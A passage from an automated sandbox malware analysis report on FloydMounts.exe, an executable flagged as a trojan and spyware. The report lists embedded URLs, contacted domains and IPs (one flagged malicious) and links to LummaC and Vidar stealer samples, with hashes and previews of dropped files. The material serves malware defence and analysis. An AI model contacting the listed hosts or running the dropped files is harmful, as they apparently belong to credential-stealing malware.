                                                http://ocsp.sectigo.com0X4PCDQPDT1B8IDPB7SN83.tmp, 00000012.00000003.2569814319.0000000001030000.00000004.00001000.00020000.00000000.sdmp, X4PCDQPDT1B8IDPB7SN83.tmp, 00000012.00000003.2563365682.0000000003830000.00000004.00001000.00020000.00000000.sdmp, X4PCDQPDT1B8IDPB7SN83.tmp, 00000014.00000003.3093420378.0000000002630000.00000004.00001000.00020000.00000000.sdmp, FloydMounts.exefalse
                                                  		high
                                                  http://faq.zipgenius.it/ulu_mon.exe, 0000002F.00000000.3082301174.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, ulu_mon.exe, 0000002F.00000002.3174780608.0000000010015000.00000004.00000020.00020000.00000000.sdmp, is-PGV92.tmp.20.drfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://jcl.svn.sourceforge.net:443/svnroot/jcl/tags/JCL-2.2-Build3845/jcl/source/common/JclUnicode.is-PGV92.tmp.20.drfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://api.qrtag.net/qrcode/240/is-PGV92.tmp.20.drfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://jcl.svn.sourceforge.net:443/svnroot/jcl/tags/JCL-2.2-Build3845/jcl/source/common/JclWideStriis-PGV92.tmp.20.drfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://jcl.svn.sourceforge.net:443/svnroot/jcl/tags/JCL-2.2-Build3845/jcl/source/windows/Snmp.pasis-PGV92.tmp.20.drfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.zipgenius.itis-PGV92.tmp.20.drfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.zipgenius.it/Uulu_mon.exe, 0000002F.00000000.3082301174.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, ulu_mon.exe, 0000002F.00000002.3174780608.0000000010015000.00000004.00000020.00020000.00000000.sdmp, is-PGV92.tmp.20.drfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.virusportal.com/com/virusinfo/encyclopedia/results.aspx?term=ulu_mon.exe, 0000002F.00000000.3082301174.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, ulu_mon.exe, 0000002F.00000002.3174780608.0000000010015000.00000004.00000020.00020000.00000000.sdmp, is-PGV92.tmp.20.drfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.programmiamo.net)ulu_mon.exe, 0000002F.00000002.3174780608.0000000010C5B000.00000004.00000020.00020000.00000000.sdmp, ulu_mon.exe, 0000002F.00000000.3084576961.000000000105E000.00000002.00000001.01000000.0000000D.sdmp, is-PGV92.tmp.20.drfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://crt.sectigo.com/SectigX4PCDQPDT1B8IDPB7SN83.tmp, 00000012.00000003.2569814319.0000000001030000.00000004.00001000.00020000.00000000.sdmp, X4PCDQPDT1B8IDPB7SN83.tmp, 00000014.00000003.3093420378.0000000002630000.00000004.00001000.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://jcl.svn.sourceforge.net:443/svnroot/jcl/tags/JCL-2.2-Build3845/jcl/source/common/JclSimpleXmis-PGV92.tmp.20.drfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://subca.ocsp-certum.com01X4PCDQPDT1B8IDPB7SN83.tmp, 00000012.00000003.2569814319.0000000001030000.00000004.00001000.00020000.00000000.sdmp, X4PCDQPDT1B8IDPB7SN83.tmp, 00000012.00000003.2563365682.0000000003830000.00000004.00001000.00020000.00000000.sdmp, X4PCDQPDT1B8IDPB7SN83.tmp, 00000014.00000003.3093420378.0000000002630000.00000004.00001000.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://www.snapfiles.com)ulu_mon.exe, 0000002F.00000002.3174780608.0000000010C5B000.00000004.00000020.00020000.00000000.sdmp, ulu_mon.exe, 0000002F.00000000.3084576961.000000000105E000.00000002.00000001.01000000.0000000D.sdmp, is-PGV92.tmp.20.drfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://jcl.svn.sourceforge.net:443/svnroot/jcl/tags/JCL-2.2-Build3845/jcl/source/common/JclResourceis-PGV92.tmp.20.drfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.zipgenius.it/zg5/external_app.htmopenUulu_mon.exe, 0000002F.00000000.3082301174.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, ulu_mon.exe, 0000002F.00000002.3174780608.0000000010015000.00000004.00000020.00020000.00000000.sdmp, is-PGV92.tmp.20.drfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://sectigo.com/CPS0DX4PCDQPDT1B8IDPB7SN83.tmp, 00000012.00000003.2569814319.0000000001030000.00000004.00001000.00020000.00000000.sdmp, X4PCDQPDT1B8IDPB7SN83.tmp, 00000012.00000003.2563365682.0000000003830000.00000004.00001000.00020000.00000000.sdmp, X4PCDQPDT1B8IDPB7SN83.tmp, 00000014.00000003.3093420378.0000000002630000.00000004.00001000.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://www.7-zip.org)ulu_mon.exe, 0000002F.00000002.3174780608.0000000010C5B000.00000004.00000020.00020000.00000000.sdmp, ulu_mon.exe, 0000002F.00000000.3084576961.000000000105E000.00000002.00000001.01000000.0000000D.sdmp, is-PGV92.tmp.20.drfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        https://jrsoftware.org0X4PCDQPDT1B8IDPB7SN83.tmp, 00000012.00000003.2569814319.0000000001030000.00000004.00001000.00020000.00000000.sdmp, X4PCDQPDT1B8IDPB7SN83.tmp, 00000012.00000003.2563365682.0000000003830000.00000004.00001000.00020000.00000000.sdmp, X4PCDQPDT1B8IDPB7SN83.tmp, 00000014.00000003.3093420378.0000000002630000.00000004.00001000.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://jrsoftware.org/X4PCDQPDT1B8IDPB7SN83.tmp, 00000012.00000003.2569814319.0000000001030000.00000004.00001000.00020000.00000000.sdmp, X4PCDQPDT1B8IDPB7SN83.tmp, 00000012.00000003.2563365682.0000000003830000.00000004.00001000.00020000.00000000.sdmp, X4PCDQPDT1B8IDPB7SN83.tmp, 00000014.00000003.3093420378.0000000002630000.00000004.00001000.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://jcl.svn.sourceforge.net:443/svnroot/jcl/tags/JCL-2.2-Build3845/jcl/source/windows/JclSecuritis-PGV92.tmp.20.drfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://antivirus.zipgenius.itopenUulu_mon.exe, 0000002F.00000000.3082301174.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, ulu_mon.exe, 0000002F.00000002.3174780608.0000000010015000.00000004.00000020.00020000.00000000.sdmp, is-PGV92.tmp.20.drfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.quickzip.orgulu_mon.exe, 0000002F.00000002.3174780608.0000000010C5B000.00000004.00000020.00020000.00000000.sdmp, ulu_mon.exe, 0000002F.00000000.3084576961.000000000105E000.00000002.00000001.01000000.0000000D.sdmp, is-PGV92.tmp.20.drfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.reggiocal.itulu_mon.exe, 0000002F.00000002.3174780608.0000000010C5B000.00000004.00000020.00020000.00000000.sdmp, ulu_mon.exe, 0000002F.00000000.3084576961.000000000105E000.00000002.00000001.01000000.0000000D.sdmp, is-PGV92.tmp.20.drfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            https://jcl.svn.sourceforge.net:443/svnroot/jcl/tags/JCL-2.2-Build3845/jcl/source/common/JclCompressis-PGV92.tmp.20.drfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            https://jcl.svn.sourceforge.net:443/svnroot/jcl/tags/JCL-2.2-Build3845/jcl/source/common/JclSysInfo.is-PGV92.tmp.20.drfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            https://sectigo.com/CPS0X4PCDQPDT1B8IDPB7SN83.tmp, 00000012.00000003.2569814319.0000000001030000.00000004.00001000.00020000.00000000.sdmp, X4PCDQPDT1B8IDPB7SN83.tmp, 00000014.00000003.3093420378.0000000002630000.00000004.00001000.00020000.00000000.sdmp, FloydMounts.exefalse
                                                              		high
                                                              http://repository.certum.pl/ctnca.cer09X4PCDQPDT1B8IDPB7SN83.tmp, 00000012.00000003.2569814319.0000000001030000.00000004.00001000.00020000.00000000.sdmp, X4PCDQPDT1B8IDPB7SN83.tmp, 00000012.00000003.2563365682.0000000003830000.00000004.00001000.00020000.00000000.sdmp, X4PCDQPDT1B8IDPB7SN83.tmp, 00000014.00000003.3093420378.0000000002630000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://forum.zipgenius.itopenUulu_mon.exe, 0000002F.00000000.3082301174.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, ulu_mon.exe, 0000002F.00000002.3174780608.0000000010015000.00000004.00000020.00020000.00000000.sdmp, is-PGV92.tmp.20.drfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://jcl.svn.sourceforge.net:443/svnroot/jcl/tags/JCL-2.2-Build3845/jcl/source/windows/JclShell.pis-PGV92.tmp.20.drfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.winmagazine.it)ulu_mon.exe, 0000002F.00000002.3174780608.0000000010C5B000.00000004.00000020.00020000.00000000.sdmp, ulu_mon.exe, 0000002F.00000000.3084576961.000000000105E000.00000002.00000001.01000000.0000000D.sdmp, is-PGV92.tmp.20.drfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://jcl.svn.sourceforge.net:443/svnroot/jcl/tags/JCL-2.2-Build3845/jcl/source/common/JclMime.pasis-PGV92.tmp.20.drfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://forum.wininizio.itulu_mon.exe, 0000002F.00000002.3174780608.0000000010C5B000.00000004.00000020.00020000.00000000.sdmp, ulu_mon.exe, 0000002F.00000000.3084576961.000000000105E000.00000002.00000001.01000000.0000000D.sdmp, is-PGV92.tmp.20.drfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.zipgenius.itopenUulu_mon.exe, 0000002F.00000000.3082301174.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, ulu_mon.exe, 0000002F.00000002.3174780608.0000000010015000.00000004.00000020.00020000.00000000.sdmp, is-PGV92.tmp.20.drfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://help.zipgenius.itUulu_mon.exe, 0000002F.00000000.3082301174.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, ulu_mon.exe, 0000002F.00000002.3174780608.0000000010015000.00000004.00000020.00020000.00000000.sdmp, is-PGV92.tmp.20.drfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.vmware.com/0/ulu_mon.exe, 0000002F.00000002.3162136925.0000000005F27000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://www.zipgenius.com/index.php?id=94is-PGV92.tmp.20.drfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  http://downloads.zipgenius.itulu_mon.exe, 0000002F.00000000.3082301174.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, ulu_mon.exe, 0000002F.00000002.3174780608.0000000010015000.00000004.00000020.00020000.00000000.sdmp, is-PGV92.tmp.20.drfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  http://www.zipgenius.it/zg5/external_app.htmulu_mon.exe, 0000002F.00000000.3082301174.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, ulu_mon.exe, 0000002F.00000002.3174780608.0000000010015000.00000004.00000020.00020000.00000000.sdmp, is-PGV92.tmp.20.drfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  http://faq.zipgenius.com/ulu_mon.exe, 0000002F.00000000.3082301174.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, ulu_mon.exe, 0000002F.00000002.3174780608.0000000010015000.00000004.00000020.00020000.00000000.sdmp, is-PGV92.tmp.20.drfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  https://www.certum.pl/CPS0X4PCDQPDT1B8IDPB7SN83.tmp, 00000012.00000003.2569814319.0000000001030000.00000004.00001000.00020000.00000000.sdmp, X4PCDQPDT1B8IDPB7SN83.tmp, 00000012.00000003.2563365682.0000000003830000.00000004.00001000.00020000.00000000.sdmp, X4PCDQPDT1B8IDPB7SN83.tmp, 00000014.00000003.3093420378.0000000002630000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://jcl.svn.sourceforge.net:443/svnroot/jcl/tags/JCL-2.2-Build3845/jcl/source/common/zlibh.pasis-PGV92.tmp.20.drfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    http://help.zipgenius.comulu_mon.exe, 0000002F.00000000.3082301174.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, ulu_mon.exe, 0000002F.00000002.3174780608.0000000010015000.00000004.00000020.00020000.00000000.sdmp, is-PGV92.tmp.20.drfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    https://jcl.svn.sourceforge.net:443/svnroot/jcl/tags/JCL-2.2-Build3845/jcl/source/common/JclLogic.pais-PGV92.tmp.20.drfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    http://crl.certum.pl/cscasha2.crl0qX4PCDQPDT1B8IDPB7SN83.tmp, 00000014.00000003.3093420378.0000000002630000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://jcl.svn.sourceforge.net:443/svnroot/jcl/tags/JCL-2.2-Build3845/jcl/source/common/JclFileUtilis-PGV92.tmp.20.drfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      http://cscasha2.ocsp-certum.com04X4PCDQPDT1B8IDPB7SN83.tmp, 00000012.00000003.2569814319.0000000001030000.00000004.00001000.00020000.00000000.sdmp, X4PCDQPDT1B8IDPB7SN83.tmp, 00000012.00000003.2563365682.0000000003830000.00000004.00001000.00020000.00000000.sdmp, X4PCDQPDT1B8IDPB7SN83.tmp, 00000014.00000003.3093420378.0000000002630000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                        		high

                                                                        World Map of Contacted IPs

                                                                        • No. of IPs < 25%
                                                                        • 25% < No. of IPs < 50%
                                                                        • 50% < No. of IPs < 75%
                                                                        • 75% < No. of IPs

                                                                        Public IPs

                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                        104.21.74.235
                                                                        		klipjarifaa.shopUnited States
                                                                        		13335CLOUDFLARENETUSfalse
                                                                        104.21.25.41
                                                                        		wetlivelky.clickUnited States
                                                                        		13335CLOUDFLARENETUStrue

                                                                        General Information

                                                                        Joe Sandbox version:41.0.0 Charoite
                                                                        Analysis ID:1581279
                                                                        Start date and time:2024-12-27 10:10:05 +01:00
                                                                        Joe Sandbox product:CloudBasic
                                                                        Overall analysis duration:0h 11m 42s
                                                                        Hypervisor based Inspection enabled:false
                                                                        Report type:full
                                                                        Cookbook file name:default.jbs
                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                        Number of analysed new started processes analysed:48
                                                                        Number of new started drivers analysed:0
                                                                        Number of existing processes analysed:0
                                                                        Number of existing drivers analysed:0
                                                                        Number of injected processes analysed:0
                                                                        Technologies:
                                                                        • HCA enabled
                                                                        • EGA enabled
                                                                        • AMSI enabled
                                                                        Analysis Mode:default
                                                                        Analysis stop reason:Timeout
                                                                        Sample name:FloydMounts.exe
                                                                        Detection:MAL
                                                                        Classification:mal100.troj.spyw.evad.winEXE@79/31@3/2
                                                                        EGA Information:
                                                                        • Successful, ratio: 100%
                                                                        HCA Information:
                                                                        • Successful, ratio: 100%
                                                                        • Number of executed functions: 32
                                                                        • Number of non-executed functions: 41
                                                                        Cookbook Comments:
                                                                        • Found application associated with file extension: .exe
                                                                        • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                        • Stop behavior analysis, all processes terminated

                                                                        Warnings

                                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                        • Excluded IPs from analysis (whitelisted): 4.175.87.197, 13.107.246.63
                                                                        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                        Simulations

                                                                        Behavior and APIs

                                                                        TimeTypeDescription
                                                                        04:10:55API Interceptor1x Sleep call for process: FloydMounts.exe modified
                                                                        04:11:33API Interceptor13x Sleep call for process: Produces.com modified

                                                                        Joe Sandbox View / Context

                                                                        IPs

                                                                        No context

                                                                        Domains

                                                                        No context

                                                                        ASNs

                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        CLOUDFLARENETUS5uVReRlvME.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, PureLog Stealer, Remcos, StealcBrowse
                                                                        • 172.67.165.185
                                                                        0A7XTINw3R.exeGet hashmaliciousUnknownBrowse
                                                                        • 104.26.8.44
                                                                        RDb082EApV.exeGet hashmaliciousLummaCBrowse
                                                                        • 104.21.11.101
                                                                        GnHq2ZaBUl.exeGet hashmaliciousLummaCBrowse
                                                                        • 104.21.11.101
                                                                        vVJvxAfBDM.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                        • 104.21.11.101
                                                                        LIWYEYWSOj.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                        • 172.67.165.185
                                                                        K9esyY0r4G.lnkGet hashmaliciousUnknownBrowse
                                                                        • 104.21.67.124
                                                                        onaUtwpiyq.exeGet hashmaliciousLummaCBrowse
                                                                        • 104.21.11.101
                                                                        CAo57G5Cio.exeGet hashmaliciousLummaCBrowse
                                                                        • 172.67.165.185
                                                                        fer4JIJGeL.exeGet hashmaliciousLummaCBrowse
                                                                        • 172.67.165.185
                                                                        CLOUDFLARENETUS5uVReRlvME.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, PureLog Stealer, Remcos, StealcBrowse
                                                                        • 172.67.165.185
                                                                        0A7XTINw3R.exeGet hashmaliciousUnknownBrowse
                                                                        • 104.26.8.44
                                                                        RDb082EApV.exeGet hashmaliciousLummaCBrowse
                                                                        • 104.21.11.101
                                                                        GnHq2ZaBUl.exeGet hashmaliciousLummaCBrowse
                                                                        • 104.21.11.101
                                                                        vVJvxAfBDM.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                        • 104.21.11.101
                                                                        LIWYEYWSOj.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                        • 172.67.165.185
                                                                        K9esyY0r4G.lnkGet hashmaliciousUnknownBrowse
                                                                        • 104.21.67.124
                                                                        onaUtwpiyq.exeGet hashmaliciousLummaCBrowse
                                                                        • 104.21.11.101
                                                                        CAo57G5Cio.exeGet hashmaliciousLummaCBrowse
                                                                        • 172.67.165.185
                                                                        fer4JIJGeL.exeGet hashmaliciousLummaCBrowse
                                                                        • 172.67.165.185

                                                                        JA3 Fingerprints

                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        a0e9f5d64349fb13191bc781f81f42e1RDb082EApV.exeGet hashmaliciousLummaCBrowse
                                                                        • 104.21.74.235
                                                                        • 104.21.25.41
                                                                        GnHq2ZaBUl.exeGet hashmaliciousLummaCBrowse
                                                                        • 104.21.74.235
                                                                        • 104.21.25.41
                                                                        vVJvxAfBDM.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                        • 104.21.74.235
                                                                        • 104.21.25.41
                                                                        LIWYEYWSOj.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                        • 104.21.74.235
                                                                        • 104.21.25.41
                                                                        onaUtwpiyq.exeGet hashmaliciousLummaCBrowse
                                                                        • 104.21.74.235
                                                                        • 104.21.25.41
                                                                        CAo57G5Cio.exeGet hashmaliciousLummaCBrowse
                                                                        • 104.21.74.235
                                                                        • 104.21.25.41
                                                                        fer4JIJGeL.exeGet hashmaliciousLummaCBrowse
                                                                        • 104.21.74.235
                                                                        • 104.21.25.41
                                                                        AaEBZ7icLd.exeGet hashmaliciousLummaCBrowse
                                                                        • 104.21.74.235
                                                                        • 104.21.25.41
                                                                        wJtkC63Spw.exeGet hashmaliciousLummaCBrowse
                                                                        • 104.21.74.235
                                                                        • 104.21.25.41
                                                                        cFLK1CiiNK.exeGet hashmaliciousLummaCBrowse
                                                                        • 104.21.74.235
                                                                        • 104.21.25.41

                                                                        Dropped Files

                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        C:\Users\user\AppData\Local\Temp\174436\Produces.cominstaller.batGet hashmaliciousVidarBrowse
                                                                          skript.batGet hashmaliciousVidarBrowse
                                                                            din.exeGet hashmaliciousVidarBrowse
                                                                              yoda.exeGet hashmaliciousVidarBrowse
                                                                                lem.exeGet hashmaliciousVidarBrowse
                                                                                  script.ps1Get hashmaliciousVidarBrowse
                                                                                    installer_1.05_36.4.zipGet hashmaliciousNetSupport RAT, LummaC, LummaC StealerBrowse
                                                                                      Set-up.exeGet hashmaliciousLummaCBrowse
                                                                                        Set-up.exeGet hashmaliciousLummaC StealerBrowse
                                                                                          PodcastsTries.exeGet hashmaliciousVidarBrowse

                                                                                            Created / dropped Files

                                                                                            C:\Users\user\AppData\Local\Temp\174436\Produces.com

                                                                                            Download File
                                                                                            Process:C:\Windows\SysWOW64\cmd.exe
                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                            Category:modified
                                                                                            Size (bytes):947288
                                                                                            Entropy (8bit):6.630612696399572
                                                                                            Encrypted:false
                                                                                            SSDEEP:24576:uvG4FEq/TQ+Svbi3zcNjmsuENOJuM8WU2a+BYK:u9GqLQHbijkmc2umva+OK
                                                                                            MD5:62D09F076E6E0240548C2F837536A46A
                                                                                            SHA1:26BDBC63AF8ABAE9A8FB6EC0913A307EF6614CF2
                                                                                            SHA-256:1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
                                                                                            SHA-512:32DE0D8BB57F3D3EB01D16950B07176866C7FB2E737D9811F61F7BE6606A6A38A5FC5D4D2AE54A190636409B2A7943ABCA292D6CEFAA89DF1FC474A1312C695F
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                            Joe Sandbox View:
                                                                                            • Filename: installer.bat, Detection: malicious, Browse
                                                                                            • Filename: skript.bat, Detection: malicious, Browse
                                                                                            • Filename: din.exe, Detection: malicious, Browse
                                                                                            • Filename: yoda.exe, Detection: malicious, Browse
                                                                                            • Filename: lem.exe, Detection: malicious, Browse
                                                                                            • Filename: script.ps1, Detection: malicious, Browse
                                                                                            • Filename: installer_1.05_36.4.zip, Detection: malicious, Browse
                                                                                            • Filename: Set-up.exe, Detection: malicious, Browse
                                                                                            • Filename: Set-up.exe, Detection: malicious, Browse
                                                                                            • Filename: PodcastsTries.exe, Detection: malicious, Browse
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................@..B................................................................................................................................................................................................................................................................................

                                                                                            C:\Users\user\AppData\Local\Temp\174436\U

                                                                                            Download File
                                                                                            Process:C:\Windows\SysWOW64\cmd.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):460377
                                                                                            Entropy (8bit):7.999632398947576
                                                                                            Encrypted:true
                                                                                            SSDEEP:12288:6BjzmEfUbGpNFnCrH/ZT5zJYB0oYiaKf+99A6zBJJB0doJu+2dcvMWXh:oq+AK7Cr53CZYiaKf+99zBLZYFckWx
                                                                                            MD5:3423C47FCBF517D14A59D1469F20E531
                                                                                            SHA1:B8BE0F23C4C1D6708DE707D08EE2BD2DA198355E
                                                                                            SHA-256:F5F7D047A38D4E6EE68B1D4EC4824F692A87674A9C0608BD190C352FA3260E91
                                                                                            SHA-512:0E626CBFFA15FB09E16CDACA332AA99654B2A3EA6E97B3892D01B619F1B72DF36CB47163281F0DC9992C0F66006CFB225385922C4FACF725D7485AA17B61909E
                                                                                            Malicious:false
                                                                                            Preview:...2.n.A..;..b.[.w....O6.r.C..I.u,..-...t..gZ....!.]....'..p..yJ....ibm....=...E.(.... ...........F..sZ*..T....*...2)...juhw}...e~.d.im.T...n.%..wa..97X!I.......`....*u.T....C.e{..D..i.b...6\4..bI.t..%.......{..i.........c....2.!)^.qDl....3w.g.EY.P..,...OH.z...Z..zHg.,..q.....5L.#F.2._..R.".......N....V...Sq<Dg.......o.-n..>78..$..YJ..S^...s...Or._:(.T.......:.i.(.Q.>.........v...X.j{'.|.g.\9.].'.q.........,...q#...N)...I..........^c.sg0aO..d.K.jZG1:...[.&H........J...q&..6.68<]......c....:..jH".>.tM....$......r...91...6j...`..=Lp..%.....HK..lJ..LS...H}AU3!EA06M..s$.<.z..g....kC.R.....:!.)......@...F..k;!..u:.=..3............d.a.Mb...l.t.jxI..8.v...r.T...txH..!..)98O...,.XOg;Mm.=..A..FPWW.....Y...$c..F.Kx...i..f3.H....2)...<.9.m....&...4....R....2.G.'.F...h..............W.......W......kC.R......%x....}...q..U-...(....%....V..?p.hf..........@.#....{'.l..v..*)~.K....dC`:.......c!.).A.&!0..~..}..h..w14.h.%.!4.A...V..+}.,{{.s.x..K....V.E...

                                                                                            C:\Users\user\AppData\Local\Temp\Administration

                                                                                            Download File
                                                                                            Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):147456
                                                                                            Entropy (8bit):5.612342605919228
                                                                                            Encrypted:false
                                                                                            SSDEEP:1536:hKaj6iTcPAsAhxjgarB/5el3EYrDWyu0uZo2+9BGmdATGODv7xvTw:96whxjgarB/5elDWy4ZNoGmROL7F8
                                                                                            MD5:0B03608004F35CB86149E3D73B114140
                                                                                            SHA1:1DE540EF6599AB4364DAD778EAF3B85D734431B8
                                                                                            SHA-256:453DA8DC2BBF24B0DB78A7BC158B22226A0F1E3C26A5A0E9BDB7198E708F009A
                                                                                            SHA-512:BEAE9C49B640A44A243A97C6A43CB6EB8C49F6625874519494D8E0FACDE664D2D63FF9A46C9D144A917A8A42FC5C431D958FE0713FF03B52CD940C6647AFD884
                                                                                            Malicious:false
                                                                                            Preview:.....................................................................................................................................................................................................................................................r.r...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................r.r.................................r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.........r.......................................................r.....r...r.r...r.....................r.........r...r...r.r.r.r.r.r...r.r.r

                                                                                            C:\Users\user\AppData\Local\Temp\Array

                                                                                            Download File
                                                                                            Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):147456
                                                                                            Entropy (8bit):6.479185291916021
                                                                                            Encrypted:false
                                                                                            SSDEEP:3072:sjGWoUlJUPdgQa8Bp/LxyA3laW2UDQWf05mjccBiqXvpgF4qv+32eOyK5:sjGgQaE/loUDtf0accB3gBmmLD
                                                                                            MD5:DC1DB0397E6BE0E1D208E452B171BFF9
                                                                                            SHA1:1BDBC6E06AEA702CA5EC4435A34C9BF437D272A7
                                                                                            SHA-256:8C7F3AA431CCE318CD09F514F6031FCB436D3CC9BCEB5AD25970DD725A845813
                                                                                            SHA-512:6945BD1AFA6F6985A5EB0A2CE95BF471B7CC299CEDA43A860D38433B8AB55F2D111829DB2C3723398E4769CE5C8473A6A11FF9859191AB856A1C90548E8BAD70
                                                                                            Malicious:false
